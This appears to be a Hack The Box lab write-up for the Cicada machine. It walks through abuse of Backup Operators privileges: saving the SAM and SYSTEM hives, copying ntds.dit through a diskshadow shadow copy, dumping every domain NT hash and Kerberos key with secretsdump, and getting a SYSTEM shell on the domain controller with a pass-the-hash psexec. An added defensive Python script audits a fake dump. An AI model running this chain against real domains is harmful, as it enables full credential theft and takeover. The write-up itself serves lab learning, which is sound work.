Backup Operators
The emily.oscars user has both SeBackupPrivilege and SeRestorePrivilege, granted through membership in the Backup Operators group. The group is a privileged group that can be leveraged for privilege escalation.
Both SeBackupPrivilege and SeRestorePrivilege are, by default, inherited from membership in the Backup Operators group in an Active Directory environment, along with a few other privileges that aren't relevant for privilege escalation.
This was somewhat predicted in the earlier stage of the operation, as I knew that the emily.oscars user is part of the Backup Operators group.
Essentially, those two privileges grant read and write access to EVERY FILE on the system, regardless of the file's ACL.
SAM/SYSTEM
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cmd /c reg save HKLM\SAM sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cmd /c reg save HKLM\SYSTEM system
The operation completed successfully.
I can exploit this by simply saving the SAM and SYSTEM hives, since I have read/write access to EVERY FILE on the system.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download .\sam
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download .\system
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\system to system
Info: Download successful!
Downloading them to Kali
Hashdump
┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ impacket-secretsdump local -sam ./sam -system system
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
NTDS.dit
I can also extract the entire AD database, NTDS.dit.
┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ cat diskshadow.txt
set context persistent nowriters
add volume c: alias someAlias
create
expose %somealias% s:
First, I need to prepare a script for diskshadow.exe.
┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ unix2dos diskshadow.txt
unix2dos: converting file diskshadow.txt to DOS format...
Converting it to DOS (CRLF) line endings so that diskshadow.exe can read it.
*Evil-WinRM* PS C:\tmp> upload diskshadow.txt
Info: Uploading /home/kali/archive/htb/labs/cicada/diskshadow.txt to C:\tmp\diskshadow.txt
Data: 128 bytes of 128 bytes copied
Info: Upload successful!
Uploading the script
*Evil-WinRM* PS C:\tmp> cmd /c diskshadow.exe /s .\diskshadow.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: CICADA-DC, 9/28/2024 10:17:41 PM
-> set context persistent nowriters
-> add volume c: alias someAlias
-> create
Alias someAlias for shadow ID {5ba7aa1f-cbdd-4aa7-8882-0344ea329a98} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {a0a31be0-5232-48c0-b60c-2cceb4b4c3c3} set as environment variable.
Querying all shadow copies with the shadow copy set ID {a0a31be0-5232-48c0-b60c-2cceb4b4c3c3}
* Shadow copy ID = {5ba7aa1f-cbdd-4aa7-8882-0344ea329a98} %someAlias%
- Shadow copy set: {a0a31be0-5232-48c0-b60c-2cceb4b4c3c3} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{fcebaf9b-0000-0000-0000-500600000000}\ [C:\]
- Creation time: 9/28/2024 10:17:41 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: CICADA-DC.cicada.htb
- Service machine: CICADA-DC.cicada.htb
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %somealias% s:
-> %somealias% = {5ba7aa1f-cbdd-4aa7-8882-0344ea329a98}
The shadow copy was successfully exposed as s:\.
->
Executing diskshadow.exe creates a shadow copy of the entire C:\ volume and exposes it as the arbitrary S:\ drive.
*Evil-WinRM* PS C:\tmp> cmd /c robocopy.exe /b S:\Windows\ntds . ntds.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Saturday, September 28, 2024 10:18:38 PM
Source : S:\Windows\ntds\
Dest : C:\tmp\
Files : ntds.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 S:\Windows\ntds\
New File 16.0 m ntds.dit
0.0%
[...REDACTED...]
100%
------------------------------------------------------------------------------
Total Copied Skipped Mismatch FAILED Extras
Dirs : 1 0 1 0 0 0
Files : 1 1 0 0 0 0
Bytes : 16.00 m 16.00 m 0 0 0 0
Times : 0:00:00 0:00:00 0:00:00 0:00:00
Speed : 134,217,728 Bytes/sec.
Speed : 7,680.000 MegaBytes/min.
Ended : Saturday, September 28, 2024 10:18:38 PM
Now I can copy the AD database file, ntds.dit, from the S:\ volume into the current directory using robocopy.exe. The /b switch runs the copy in backup mode, which is what SeBackupPrivilege allows.
*Evil-WinRM* PS C:\tmp> download ntds.dit
Info: Downloading C:\tmp\ntds.dit to ntds.dit
Info: Download successful!
Downloading it to Kali
Hashdump
┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ impacket-secretsdump local -sam ./sam -system ./system -ntds ./ntds.dit
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: f954f575c626d6afe06c2b80cc2185e6
[*] Reading and decrypting hashes from ./ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CICADA-DC$:1000:aad3b435b51404eeaad3b435b51404ee:188c2f3cb7592e18d1eae37991dee696:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3779000802a4bb402736bee52963f8ef:::
cicada.htb\john.smoulder:1104:aad3b435b51404eeaad3b435b51404ee:0d33a055d07e231ce088a91975f28dc4:::
cicada.htb\sarah.dantelia:1105:aad3b435b51404eeaad3b435b51404ee:d1c88b5c2ecc0e2679000c5c73baea20:::
cicada.htb\michael.wrightson:1106:aad3b435b51404eeaad3b435b51404ee:b222964c9f247e6b225ce9e7c4276776:::
cicada.htb\david.orelious:1108:aad3b435b51404eeaad3b435b51404ee:ef0bcbf3577b729dcfa6fbe1731d5a43:::
cicada.htb\emily.oscars:1601:aad3b435b51404eeaad3b435b51404ee:559048ab2d168a4edf8e033d43165ee5:::
[*] Kerberos keys from ./ntds.dit
Administrator:aes256-cts-hmac-sha1-96:e47fd7646fa8cf1836a79166f5775405834e2c060322d229bc93f26fb67d2be5
Administrator:aes128-cts-hmac-sha1-96:f51b243b116894bea389709127df1652
Administrator:des-cbc-md5:c8838c9b10c43b23
CICADA-DC$:aes256-cts-hmac-sha1-96:e9752f2c7752bd92142588e63dc0383499f49b04a46de37845e33d40de1db7ed
CICADA-DC$:aes128-cts-hmac-sha1-96:7fc8e7f2daa14d0ccdf070de9cfc49c5
CICADA-DC$:des-cbc-md5:b0f7cdec040d5b6d
krbtgt:aes256-cts-hmac-sha1-96:357f15dd4d315af47ac63658c444526ec0186f066ad9efb46906a7308b7c60c8
krbtgt:aes128-cts-hmac-sha1-96:39cbc0f220550c51fb89046ac652849e
krbtgt:des-cbc-md5:73b6c419b3b9bf7c
cicada.htb\john.smoulder:aes256-cts-hmac-sha1-96:57ae6faf294b7e6fbd0ce5121ac413d529ae5355535e20739a19b6fd2a204128
cicada.htb\john.smoulder:aes128-cts-hmac-sha1-96:8c0add65bd3c9ad2d1f458a719cfda81
cicada.htb\john.smoulder:des-cbc-md5:f1feaeb594b08575
cicada.htb\sarah.dantelia:aes256-cts-hmac-sha1-96:e25f0b9181f532a85310ba6093f24c1f2f10ee857a97fe18d716ec713fc47060
cicada.htb\sarah.dantelia:aes128-cts-hmac-sha1-96:2ac9a92bca49147a0530e5ce84ceee7d
cicada.htb\sarah.dantelia:des-cbc-md5:0b5b014370fdab67
cicada.htb\michael.wrightson:aes256-cts-hmac-sha1-96:d89ff79cc85032f27499425d47d3421df678eace01ce589eb128a6ffa0216f46
cicada.htb\michael.wrightson:aes128-cts-hmac-sha1-96:f1290a5c4e9d4ef2cd7ad470600124a9
cicada.htb\michael.wrightson:des-cbc-md5:eca8d532fd8f26bc
cicada.htb\david.orelious:aes256-cts-hmac-sha1-96:125726466d0431ed1441caafe8c0ed9ec0d10b0dbaf4fec7a184b764d8a36323
cicada.htb\david.orelious:aes128-cts-hmac-sha1-96:ce66c04e5fd902b15f5d4c611927c9c2
cicada.htb\david.orelious:des-cbc-md5:83585bc41573897f
cicada.htb\emily.oscars:aes256-cts-hmac-sha1-96:4abe28adc1d16373f4c8db4d9bfd34ea1928aca72cb69362d3d90f69d80c000f
cicada.htb\emily.oscars:aes128-cts-hmac-sha1-96:f98d74d70dfb68b70ddd821edcd6a023
cicada.htb\emily.oscars:des-cbc-md5:fd4a5497d38067cd
[*] Cleaning up...
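A dump like the one above is also what an incident responder works from after a domain compromise, and the first questions are the same every time: which accounts have an empty password, which accounts share an NT hash (password reuse, so one cracked password opens several accounts), which accounts still have an LM hash stored, and which still carry DES Kerberos keys. The following is an added example, not part of the original writeup, that parses secretsdump's `user:rid:lmhash:nthash:::` and Kerberos key line formats and answers those questions. The sample dump it runs on is constructed with fake hashes; only the empty-password NT hash and the "LM disabled" LM hash are the real well-known constants.

```python
"""Audit helper for impacket-secretsdump output.

Added example, not part of the original writeup. Parses the hash lines
(user:rid:lmhash:nthash:::) and the Kerberos key lines (user:etype:key)
and reports the findings a responder wants first. SAMPLE_DUMP below is
constructed with fake hash values; it is not the box's output.
"""
import re
from collections import defaultdict

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash when LM storage is disabled

HASH_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$")
KEY_LINE = re.compile(r"^(?P<user>[^:]+):(?P<etype>[a-z0-9-]+):(?P<key>[0-9a-f]+)$")

# Constructed sample: fake hashes, fake domain, fake accounts.
SAMPLE_DUMP = r"""
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000001:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000002:::
corp.local\svc_backup:1104:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000001:::
corp.local\j.doe:1105:0123456789abcdef0123456789abcdef:00000000000000000000000000000003:::
corp.local\legacy.app:1106:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Kerberos keys from ./ntds.dit
Administrator:aes256-cts-hmac-sha1-96:aaaa
krbtgt:des-cbc-md5:bbbb
corp.local\j.doe:des-cbc-md5:cccc
[*] Cleaning up...
"""


def parse_dump(text):
    """Return (list of hash dicts, {user: [etype, ...]}); status lines are skipped."""
    hashes, keys = [], defaultdict(list)
    for raw in text.splitlines():
        line = raw.strip()
        m = HASH_LINE.match(line)
        if m:
            hashes.append(m.groupdict())
            continue
        m = KEY_LINE.match(line)
        if m:
            keys[m["user"]].append(m["etype"])
    return hashes, keys


def audit(text):
    """Flag empty passwords, shared NT hashes, stored LM hashes and DES keys.

    Empty-password hits need cross-checking against account status
    (a disabled Guest is expected; an enabled service account is not).
    """
    hashes, keys = parse_dump(text)
    findings = defaultdict(list)
    by_nt = defaultdict(list)
    for h in hashes:
        by_nt[h["nt"]].append(h["user"])
        if h["nt"] == EMPTY_NT:
            findings["empty_password"].append(h["user"])
        if h["lm"] != EMPTY_LM:
            findings["lm_hash_stored"].append(h["user"])
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings["shared_nt_hash"].append(sorted(users))
    for user, etypes in keys.items():
        if any(e.startswith("des-") for e in etypes):
            findings["des_kerberos_key"].append(user)
    return dict(findings)


if __name__ == "__main__":
    for finding, items in audit(SAMPLE_DUMP).items():
        print(f"{finding}: {items}")
```

A shared NT hash between Administrator and a service account is the finding that matters most after a Backup Operators compromise: once the administrator hash is in hand, as it is above, every account sharing it is already compromised, and all of them need a reset, not just the one that was dumped.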
Domain Level Compromise
Shell Drop
┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ impacket-psexec administrator@$IP -hashes :2b87e7c93a3e8a0ea4a581937016f341
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Requesting shares on 10.129.41.192.....
[*] Found writable share ADMIN$
[*] Uploading file ryqUmWKu.exe
[*] Opening SVCManager on 10.129.41.192.....
[*] Creating service HqZr on 10.129.41.192.....
[*] Starting service HqZr.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2700]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
CICADA-DC
C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::29
IPv6 Address. . . . . . . . . . . : dead:beef::46c0:3971:5ebf:3844
Link-local IPv6 Address . . . . . : fe80::f65a:ca26:f7f6:2508%6
IPv4 Address. . . . . . . . . . . : 10.129.41.192
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:fe94:3911%6
10.129.0.1
System Level Compromise